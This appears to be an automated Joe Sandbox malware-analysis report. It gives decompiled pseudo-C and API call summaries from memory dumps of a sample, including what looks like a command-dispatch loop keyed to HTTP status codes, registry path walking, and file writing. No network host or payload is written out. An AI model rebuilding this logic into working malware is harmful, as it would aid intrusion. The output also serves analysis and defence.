      • Part of subcall function 0039F630: memcpy.MSVCRT ref: 0039F66B
    • memset.MSVCRT ref: 003B0817
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039EE40, Relevance: 4.7, APIs: 3, Instructions: 175
    C-Code - Quality: 66%
    			E0039EE40(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v1316;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t100;
				char _t123;
				signed int _t124;
				void* _t126;
				void* _t127;

				_t123 = 0;
				_t126 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t93 = 0;
				_v24 = 0;
				E00391B20( &_v1316, __edx, __eflags);
				if( *((intOrPtr*)(_t126 + 0xc)) == 0) {
					L25:
					_t62 = _v8;
					if(_v8 != _t123) {
						E0039BB40(_t62); // executed
						_t127 = _t127 + 4;
					}
					_t63 = _v16;
					if(_v16 != _t123) {
						E0039BB40(_t63);
						_t127 = _t127 + 4;
					}
					if(_v24 == _t123 && _t93 != _t123) {
						E00397A20(_t93, _t93, _t123);
						_push(_t93);
						L00391CB0();
						_t93 = 0;
					}
					E0039F850(_t93,  &_v1316);
					return _t93;
				}
				_v28 = E003926A0( *((intOrPtr*)(_t126 + 8)));
				if(E003A0AD0( &_v1316, _t69) == 0) {
					L23:
					_t71 = _v28;
					_t123 = 0;
					if(_v28 != 0) {
						E0039BB40(_t71);
						_t127 = _t127 + 4;
					}
					goto L25;
				}
				_t73 =  *((intOrPtr*)(_t126 + 0xc));
				_t100 =  *((intOrPtr*)(_t73 + 0x18));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) - 1;
				_v20 = _t100;
				if(_t100 <= 0) {
					goto L23;
				} else {
					goto L3;
				}
				do {
					L3:
					 *( *((intOrPtr*)(_t126 + 0xc)) + 0x24) =  *( *((intOrPtr*)(_t126 + 0xc)) + 0x24) + 1;
					_t75 =  *((intOrPtr*)(_t126 + 0xc));
					_v20 = _v20 - 1;
					if( *((intOrPtr*)(_t75 + 0x24)) >=  *((intOrPtr*)(_t75 + 0x18))) {
						 *((intOrPtr*)(_t75 + 0x24)) = 0;
					}
					_t124 =  *( *((intOrPtr*)(_t126 + 0xc)) + 0x24);
					_t77 = _v8;
					if(_v8 != 0) {
						E0039BB40(_t77);
						_t127 = _t127 + 4;
						_v8 = 0;
						_v12 = 0;
					}
					_v1316 =  *((intOrPtr*)( *((intOrPtr*)(_t126 + 8))));
					_t80 = L003994D0( &_v1316,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) + 0x1c)) + _t124 * 4)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) + 0x20)) + _t124 * 4))); // executed
					if(_t80 == 0) {
						goto L18;
					}
					_t125 = _a4;
					_push( &_v12);
					_push( &_v8);
					_push(_a4);
					 *_a8 = 1;
					_push(5);
					_push( &_v1316); // executed
					_t82 = E00395A10(); // executed
					_t127 = _t127 + 0x14;
					if(_t82 == 0) {
						goto L18;
					}
					if(_v8 == 0 || _v12 == 0) {
						goto L23;
					} else {
						_push(0xa8);
						L0039A47E();
						_t127 = _t127 + 4;
						if(_t82 == 0) {
							_t93 = 0;
							__eflags = 0;
						} else {
							_t93 = E0039B110(_t82);
						}
						_t85 = E00397FC0(_t93,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 8)))), _v8, _v12, _t125); // executed
						if(_t85 != 0) {
							 *_a8 = 2;
							_v24 = 1;
							_t86 = E0039C7B0(_t126, __eflags, _t125);
							_v16 = _t86;
							__eflags = _t86;
							if(_t86 != 0) {
								__eflags =  *0x3b8580;
								if( *0x3b8580 == 0) {
									E00391A80(_v16, _v16, _v8, _v12); // executed
									_t127 = _t127 + 0xc;
								}
							}
							goto L23;
						} else {
							if(_t93 != 0) {
								E00397A20(_t93, _t93, _t125);
								_push(_t93);
								L00391CB0();
								_t127 = _t127 + 4;
							}
							_t93 = 0;
							goto L18;
						}
					}
					L18:
				} while (_v20 > 0);
				goto L23;
			}

























    0x0039ee4c
    0x0039ee4e
    0x0039ee56
    0x0039ee59
    0x0039ee5c
    0x0039ee5f
    0x0039ee61
    0x0039ee64
    0x0039ee6c
    0x0039effa
    0x0039effa
    0x0039efff
    0x0039f002
    0x0039f007
    0x0039f007
    0x0039f00a
    0x0039f00f
    0x0039f012
    0x0039f017
    0x0039f017
    0x0039f01d
    0x0039f025
    0x0039f02a
    0x0039f02b
    0x0039f033
    0x0039f033
    0x0039f03b
    0x0039f048
    0x0039f048
    0x0039ee81
    0x0039ee8b
    0x0039efe8
    0x0039efe8
    0x0039efeb
    0x0039efef
    0x0039eff2
    0x0039eff7
    0x0039eff7
    0x00000000
    0x0039efef
    0x0039ee91
    0x0039ee94
    0x0039ee97
    0x0039ee9a
    0x0039ee9f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039eea5
    0x0039eea5
    0x0039eead
    0x0039eeb0
    0x0039eeb3
    0x0039eebc
    0x0039eec0
    0x0039eec0
    0x0039eeca
    0x0039eecd
    0x0039eed2
    0x0039eed5
    0x0039eeda
    0x0039eedf
    0x0039eee2
    0x0039eee2
    0x0039eeed
    0x0039ef07
    0x0039ef0e
    0x00000000
    0x00000000
    0x0039ef17
    0x0039ef1d
    0x0039ef21
    0x0039ef22
    0x0039ef23
    0x0039ef2f
    0x0039ef31
    0x0039ef32
    0x0039ef37
    0x0039ef3c
    0x00000000
    0x00000000
    0x0039ef42
    0x00000000
    0x0039ef52
    0x0039ef52
    0x0039ef57
    0x0039ef5c
    0x0039ef61
    0x0039ef6e
    0x0039ef6e
    0x0039ef63
    0x0039ef6a
    0x0039ef6a
    0x0039ef81
    0x0039ef88
    0x0039efaf
    0x0039efb8
    0x0039efbf
    0x0039efc4
    0x0039efc7
    0x0039efc9
    0x0039efcb
    0x0039efd2
    0x0039efe0
    0x0039efe5
    0x0039efe5
    0x0039efd2
    0x00000000
    0x0039ef8a
    0x0039ef8c
    0x0039ef90
    0x0039ef95
    0x0039ef96
    0x0039ef9b
    0x0039ef9b
    0x0039ef9e
    0x00000000
    0x0039ef9e
    0x0039ef88
    0x0039efa0
    0x0039efa0
    0x00000000

    APIs
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B53
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B62
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B79
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B98
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 0039EF57
      • Part of subcall function 00397FC0: SysFreeString.OLEAUT32(?), ref: 00397FFB
      • Part of subcall function 00397FC0: SysAllocString.OLEAUT32(0039EF86), ref: 00398005
    • ??3@YAXPAX@Z.MSVCRT ref: 0039EF96
      • Part of subcall function 0039C7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 0039C828
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F02B
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F924
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F955
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00395A10, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 112sleep
    C-Code - Quality: 100%
    			E00395A10(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr _t38;
				void* _t39;

				_t34 = _a12;
				_t27 = 0;
				_t38 = _a4;
				_t39 = 0;
				_v8 = 0;
				_v12 = 0;
				while(_t27 == 0) {
					_t28 = _a8;
					if(_t28 > 0x40) {
						L17:
						if(_t39 == 0xc8 || _t39 == 0x193 || _t39 == 0x194) {
							L21:
							_v8 = 1;
							goto L22;
						} else {
							Sleep(0x4e20); // executed
							L22:
							_t30 = _v12 + 1;
							_v12 = _t30;
							_t27 = _v8;
							if(_t30 < 3) {
								continue;
							}
							break;
						}
					}
					switch( *((intOrPtr*)(( *(_t28 + 0x395b8c) & 0x000000ff) * 4 +  &M00395B64))) {
						case 0:
							_t33 = E00395280(_t34, _t38, _t34, _a16); // executed
							goto L16;
						case 1:
							__ecx = __edi;
							__eax = E003A13A0(__ebx, __ecx);
							goto L16;
						case 2:
							__eax = _a16;
							__ecx = __edi; // executed
							__eax = E00391200(__ecx, __ebx, _a16, _a20); // executed
							goto L16;
						case 3:
							__ecx = __edi; // executed
							__eax = E00396E80(__ecx); // executed
							goto L16;
						case 4:
							__ecx = _a16;
							__ecx = __edi; // executed
							__eax = E003A0DC0(__ecx, __ebx, _a16); // executed
							__esi = __eax;
							if(__esi == 0xc8) {
								goto L21;
							}
							if(__esi != 0x193 && __esi != 0x194) {
								Sleep(0x9c40);
							}
							goto L17;
						case 5:
							__eax = _a20;
							__ecx = _a16;
							__ecx = __edi; // executed
							__eax = E0039E5E0(__ebx, __ecx, __ebx, _a16, _a20, _a24); // executed
							goto L16;
						case 6:
							__ecx = __edi;
							__eax = E00396F60(__ebx, __ecx, __ebx);
							goto L16;
						case 7:
							__ecx = __edi; // executed
							__eax = E0039BBB0(__ecx); // executed
							goto L16;
						case 8:
							__eax = _a28;
							__ecx = _a24;
							__eax = _a16;
							_t21 = __edi + 0x4fc; // 0x4fc
							__ecx = _t21;
							__ecx = __edi;
							__eax = E003990F0(__ebx, __ecx, __edi, __esi, _t21, __ebx, _a16, _a20, _a24, _a28, _a32);
							L16:
							_t39 = _t33;
							goto L17;
						case 9:
							goto L17;
					}
				}
				return _t27;
			}











    0x00395a17
    0x00395a1b
    0x00395a1e
    0x00395a21
    0x00395a23
    0x00395a26
    0x00395a30
    0x00395a38
    0x00395a3e
    0x00395b15
    0x00395b1b
    0x00395b42
    0x00395b42
    0x00000000
    0x00395b2d
    0x00395b3e
    0x00395b49
    0x00395b4c
    0x00395b4d
    0x00395b53
    0x00395b56
    0x00000000
    0x00000000
    0x00000000
    0x00395b56
    0x00395b1b
    0x00395a4b
    0x00000000
    0x00395a59
    0x00000000
    0x00000000
    0x00395a63
    0x00395a65
    0x00000000
    0x00000000
    0x00395a72
    0x00395a78
    0x00395a7a
    0x00000000
    0x00000000
    0x00395a84
    0x00395a86
    0x00000000
    0x00000000
    0x00395a90
    0x00395a95
    0x00395a97
    0x00395a9c
    0x00395aa4
    0x00000000
    0x00000000
    0x00395ab0
    0x00395abf
    0x00395abf
    0x00000000
    0x00000000
    0x00395aca
    0x00395acd
    0x00395ad4
    0x00395ad6
    0x00000000
    0x00000000
    0x00395ade
    0x00395ae0
    0x00000000
    0x00000000
    0x00395ae7
    0x00395ae9
    0x00000000
    0x00000000
    0x00395af3
    0x00395af6
    0x00395afe
    0x00395b05
    0x00395b05
    0x00395b0c
    0x00395b0e
    0x00395b13
    0x00395b13
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00395a4b
    0x00395b62

    APIs
      • Part of subcall function 00396E80: _wtoi.MSVCRT ref: 00396ECC
    • Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
    • Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F630, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92
    C-Code - Quality: 95%
    			E0039F630(void* _a4, void* _a8) {
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				short _t23;
				short* _t26;
				short _t27;
				short _t28;
				void* _t30;
				short _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t41;
				int _t42;
				short* _t43;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t51;

				_t12 = _a8;
				if(_t12 != 0) {
					_t13 =  *0x3b8628; // 0x593938
					_t31 = 0;
					_t14 =  *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc))))(_t12, _t41, _t47, _t30);
					_t4 = _t14 + 2; // 0x2
					_t42 = _t14 + _t4;
					_t48 = E003A1D90(_t42, 0);
					memset(_t48, 0, _t42);
					memcpy(_t48, _a8, _t42);
					_t34 =  *0x3b8628; // 0x593938
					_t51 = _t50 + 0x20;
					_t7 = _t48 + 2; // 0x2
					_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1e0))))(_t7, 0x3b32c4);
					__eflags = _t43;
					if(_t43 != 0) {
						while(1) {
							_t35 = _a4;
							 *_t43 = 0; // executed
							_t23 = E0039CEA0(_a4, _t48); // executed
							_t31 = _t23;
							_t51 = _t51 + 8;
							__eflags = _t31;
							if(__eflags == 0) {
								_push(0);
								_t28 = E003997E0(_t35, __eflags, _a4, _t48);
								_t51 = _t51 + 0xc;
								_t31 = _t28;
							}
							 *_t43 = 0x5c;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							}
							_t36 =  *0x3b8628; // 0x593938
							_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1e0))))(_t43 + 2, 0x3b32c4);
							__eflags = _t43;
							if(_t43 != 0) {
								continue;
							} else {
								_t46 = _a4;
								_t26 = E0039CEA0(_a4, _t48); // executed
								_t51 = _t51 + 8;
								__eflags = _t26;
								if(__eflags == 0) {
									_push(0);
									_t27 = E003997E0(_t36, __eflags, _t46, _t48);
									_t51 = _t51 + 0xc;
									_t31 = _t27;
								}
							}
							goto L9;
						}
					}
					L9:
					E0039BB40(_t48);
					return _t31;
				} else {
					return 0;
				}
			}





















    0x0039f633
    0x0039f638
    0x0039f642
    0x0039f64a
    0x0039f64c
    0x0039f64e
    0x0039f64e
    0x0039f65b
    0x0039f660
    0x0039f66b
    0x0039f670
    0x0039f67c
    0x0039f684
    0x0039f68a
    0x0039f68c
    0x0039f68e
    0x0039f690
    0x0039f690
    0x0039f697
    0x0039f69a
    0x0039f69f
    0x0039f6a1
    0x0039f6a4
    0x0039f6a6
    0x0039f6ab
    0x0039f6af
    0x0039f6b4
    0x0039f6b7
    0x0039f6b7
    0x0039f6be
    0x0039f6c1
    0x0039f6c3
    0x00000000
    0x00000000
    0x0039f6c5
    0x0039f6dc
    0x0039f6de
    0x0039f6e0
    0x00000000
    0x0039f6e2
    0x0039f6e2
    0x0039f6e7
    0x0039f6ec
    0x0039f6ef
    0x0039f6f1
    0x0039f6f3
    0x0039f6f7
    0x0039f6fc
    0x0039f6ff
    0x0039f6ff
    0x0039f6f1
    0x00000000
    0x0039f6e0
    0x0039f690
    0x0039f701
    0x0039f702
    0x0039f710
    0x0039f63a
    0x0039f63d
    0x0039f63d

    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memset.MSVCRT ref: 0039F660
    • memcpy.MSVCRT ref: 0039F66B
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039CEA0: lstrlenW.KERNEL32(?,?,?,?,003997FA,?,?), ref: 0039CEBD
      • Part of subcall function 0039CEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEE1
      • Part of subcall function 0039CEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEFC
      • Part of subcall function 0039CEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CF1C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039D616, Relevance: 4.6, APIs: 3, Instructions: 70
    C-Code - Quality: 58%
    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				int* _t31;
				int _t32;
				int _t34;
				signed int _t41;
				signed int _t44;
				signed int _t47;
				long _t57;
				signed int _t59;
				void* _t61;
				intOrPtr _t69;

				E00397131();
				_push(0x5c);
				_push(0x3b6b40);
				E003B27E4(__ebx, __edi, __esi);
				 *(_t61 - 0x1c) = 0;
				 *((intOrPtr*)(_t61 - 4)) = 0;
				GetStartupInfoW(_t61 - 0x6c);
				 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
				 *((intOrPtr*)(_t61 - 4)) = 1;
				_t57 =  *( *[fs:0x18] + 4);
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				while(1) {
					_t27 = InterlockedCompareExchange(0x3b8c3c, _t57, 0);
					if(_t27 == 0) {
						break;
					}
					if(_t27 != _t57) {
						Sleep(0x3e8);
						continue;
					} else {
						_t59 = 1;
						 *((intOrPtr*)(_t61 - 0x20)) = 1;
					}
					L7:
					_t28 =  *0x3b8c38; // 0x2
					if(_t28 != _t59) {
						_t29 =  *0x3b8c38; // 0x2
						__eflags = _t29;
						if(__eflags != 0) {
							 *0x3b865c = _t59;
							goto L14;
						} else {
							 *0x3b8c38 = _t59;
							_t41 = E003A1B59(0x3b3240, 0x3b324c); // executed
							__eflags = _t41;
							if(__eflags == 0) {
								goto L14;
							} else {
								goto L40;
							}
						}
					} else {
						_push(0x1f);
						L0039F19C();
						L14:
						_t30 =  *0x3b8c38; // 0x2
						if(_t30 == _t59) {
							_push(0x3b323c);
							_push(0x3b3234); // executed
							L003927A8(); // executed
							 *0x3b8c38 = 2;
						}
						if( *((intOrPtr*)(_t61 - 0x20)) == 0) {
							InterlockedExchange(0x3b8c3c, 0);
						}
						_t69 =  *0x3b8c40; // 0x0
						if(_t69 != 0) {
							_push(0x3b8c40);
							if(E00393D60(0, 0x3b8c3c, _t59, _t69) != 0) {
								 *0x3b8c40(0, 2, 0);
							}
						}
						_t31 = __imp___wcmdln;
						if( *_t31 == 0) {
							L40:
							 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
							_t32 = 0xff;
						} else {
							_t34 =  *_t31;
							while(1) {
								 *(_t61 - 0x24) = _t34;
								_t44 =  *_t34 & 0x0000ffff;
								if(_t44 > 0x20 || _t44 != 0 &&  *(_t61 - 0x1c) != 0) {
									goto L34;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t47 =  *_t34 & 0x0000ffff;
									if(_t47 == 0 || _t47 > 0x20) {
										break;
									}
									_t34 = _t34 + 2;
									 *(_t61 - 0x24) = _t34;
								}
								__eflags =  *(_t61 - 0x40) & 0x00000001;
								if(( *(_t61 - 0x40) & 0x00000001) == 0) {
									_t44 = 0xa;
								} else {
									_t44 =  *(_t61 - 0x3c) & 0x0000ffff;
								}
								_push(_t44);
								_push(_t34);
								_push(0);
								_push(0x390000); // executed
								L0039FBF0(); // executed
								 *0x3b8658 = _t34;
								__eflags =  *0x3b864c; // 0x0
								if(__eflags == 0) {
									exit(_t34);
									goto L34;
								}
								__eflags =  *0x3b865c; // 0x0
								if(__eflags == 0) {
									__imp___cexit();
								}
								 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
								_t32 =  *0x3b8658; // 0x0
								goto L41;
								L34:
								__eflags = _t44 - 0x22;
								if(_t44 == 0x22) {
									__eflags =  *(_t61 - 0x1c);
									_t19 =  *(_t61 - 0x1c) == 0;
									__eflags = _t19;
									 *(_t61 - 0x1c) = 0 | _t19;
								}
								_t34 = _t34 + 2;
							}
						}
					}
					L41:
					return E003B2829(_t32);
				}
				_t59 = 1;
				__eflags = 1;
				goto L7;
			}

















    0x0039d616
    0x003b2436
    0x003b2438
    0x003b243d
    0x003b2444
    0x003b2447
    0x003b244e
    0x003b2454
    0x003b245b
    0x003b2468
    0x003b246b
    0x003b2473
    0x003b2476
    0x003b247e
    0x00000000
    0x00000000
    0x003b2482
    0x003b2491
    0x00000000
    0x003b2484
    0x003b2486
    0x003b2487
    0x003b2487
    0x003b249c
    0x003b249c
    0x003b24a3
    0x003b24af
    0x003b24b4
    0x003b24b6
    0x003b24d8
    0x00000000
    0x003b24b8
    0x003b24b8
    0x003b24c8
    0x003b24cf
    0x003b24d1
    0x00000000
    0x003b24d3
    0x00000000
    0x003b24d3
    0x003b24d1
    0x003b24a5
    0x003b24a5
    0x003b24a7
    0x003b24de
    0x003b24de
    0x003b24e5
    0x003b24e7
    0x003b24ec
    0x003b24f1
    0x003b24f8
    0x003b24f8
    0x003b2505
    0x003b2509
    0x003b2509
    0x003b250f
    0x003b2515
    0x003b2517
    0x003b2524
    0x003b252a
    0x003b252a
    0x003b2524
    0x003b2530
    0x003b2537
    0x003b2602
    0x003b2602
    0x003b2609
    0x003b253d
    0x003b253d
    0x003b253f
    0x003b253f
    0x003b2542
    0x003b2549
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003b2555
    0x003b2555
    0x003b2555
    0x003b255b
    0x00000000
    0x00000000
    0x003b2564
    0x003b2565
    0x003b2565
    0x003b256a
    0x003b256e
    0x003b2578
    0x003b2570
    0x003b2570
    0x003b2570
    0x003b2579
    0x003b257a
    0x003b257b
    0x003b257c
    0x003b2581
    0x003b2586
    0x003b258b
    0x003b2591
    0x003b2594
    0x00000000
    0x003b2594
    0x003b25df
    0x003b25e5
    0x003b25e7
    0x003b25e7
    0x003b25ed
    0x003b25f4
    0x00000000
    0x003b259a
    0x003b259a
    0x003b259e
    0x003b25a2
    0x003b25a5
    0x003b25a5
    0x003b25a8
    0x003b25a8
    0x003b25ac
    0x003b25ac
    0x003b253f
    0x003b2537
    0x003b260e
    0x003b2613
    0x003b2613
    0x003b249b
    0x003b249b
    0x00000000

    APIs
      • Part of subcall function 00397131: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397168
      • Part of subcall function 00397131: GetCurrentProcessId.KERNEL32 ref: 00397174
      • Part of subcall function 00397131: GetCurrentThreadId.KERNEL32 ref: 0039717C
      • Part of subcall function 00397131: GetTickCount.KERNEL32 ref: 00397184
      • Part of subcall function 00397131: QueryPerformanceCounter.KERNEL32(?), ref: 00397190
    • GetStartupInfoW.KERNEL32(?,003B6B40,0000005C), ref: 003B244E
    • InterlockedCompareExchange.KERNEL32(003B8C3C,?,00000000), ref: 003B2476
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B24B9, Relevance: 4.6, APIs: 3, Instructions: 59
    C-Code - Quality: 40%
    			E003B24B9(void* __eax, long __ebx, LONG* __edi, void* __esi) {
				void* _t17;
				intOrPtr _t18;
				int* _t19;
				int _t20;
				int _t22;
				signed int _t25;
				long _t28;
				signed int _t31;
				signed int _t34;
				LONG* _t38;
				void* _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t28 = __ebx;
				_t17 = E003A1B59(0x3b3240, 0x3b324c); // executed
				if(_t17 == 0) {
					_t18 =  *0x3b8c38; // 0x2
					__eflags = _t18 - __esi;
					if(_t18 == __esi) {
						_push(0x3b323c);
						_push(0x3b3234); // executed
						L003927A8(); // executed
						 *0x3b8c38 = 2;
					}
					__eflags =  *((intOrPtr*)(_t40 - 0x20)) - _t28;
					if( *((intOrPtr*)(_t40 - 0x20)) == _t28) {
						InterlockedExchange(_t38, _t28);
					}
					__eflags =  *0x3b8c40 - _t28; // 0x0
					if(__eflags != 0) {
						_push(0x3b8c40);
						_t25 = E00393D60(_t28, _t38, _t39, __eflags);
						__eflags = _t25;
						if(_t25 != 0) {
							 *0x3b8c40(_t28, 2, _t28);
						}
					}
					_t19 = __imp___wcmdln;
					__eflags =  *_t19 - _t28;
					if( *_t19 == _t28) {
						L28:
						 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
						_t20 = 0xff;
						goto L29;
					} else {
						_t22 =  *_t19;
						while(1) {
							 *(_t40 - 0x24) = _t22;
							_t31 =  *_t22 & 0x0000ffff;
							__eflags = _t31 - 0x20;
							if(_t31 > 0x20) {
								goto L22;
							}
							__eflags = _t31 - _t28;
							if(_t31 == _t28) {
								while(1) {
									L14:
									_t34 =  *_t22 & 0x0000ffff;
									__eflags = _t34 - _t28;
									if(_t34 == _t28) {
										break;
									}
									__eflags = _t34 - 0x20;
									if(_t34 > 0x20) {
										break;
									}
									_t22 = _t22 + 2;
									 *(_t40 - 0x24) = _t22;
								}
								__eflags =  *(_t40 - 0x40) & 0x00000001;
								if(( *(_t40 - 0x40) & 0x00000001) == 0) {
									_t31 = 0xa;
								} else {
									_t31 =  *(_t40 - 0x3c) & 0x0000ffff;
								}
								_push(_t31);
								_push(_t22);
								_push(_t28);
								_push(0x390000); // executed
								L0039FBF0(); // executed
								 *0x3b8658 = _t22;
								__eflags =  *0x3b864c - _t28; // 0x0
								if(__eflags != 0) {
									__eflags =  *0x3b865c - _t28; // 0x0
									if(__eflags == 0) {
										__imp___cexit();
									}
									 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
									_t20 =  *0x3b8658; // 0x0
									L29:
									return E003B2829(_t20);
								} else {
									exit(_t22);
									goto L22;
								}
							}
							__eflags =  *(_t40 - 0x1c) - _t28;
							if( *(_t40 - 0x1c) != _t28) {
								goto L22;
							}
							goto L14;
							L22:
							__eflags = _t31 - 0x22;
							if(_t31 == 0x22) {
								__eflags =  *(_t40 - 0x1c) - _t28;
								_t11 =  *(_t40 - 0x1c) == _t28;
								__eflags = _t11;
								 *(_t40 - 0x1c) = 0 | _t11;
							}
							_t22 = _t22 + 2;
						}
					}
				}
				goto L28;
			}














    0x003b24b9
    0x003b24b9
    0x003b24b9
    0x003b24c8
    0x003b24d1
    0x003b24de
    0x003b24e3
    0x003b24e5
    0x003b24e7
    0x003b24ec
    0x003b24f1
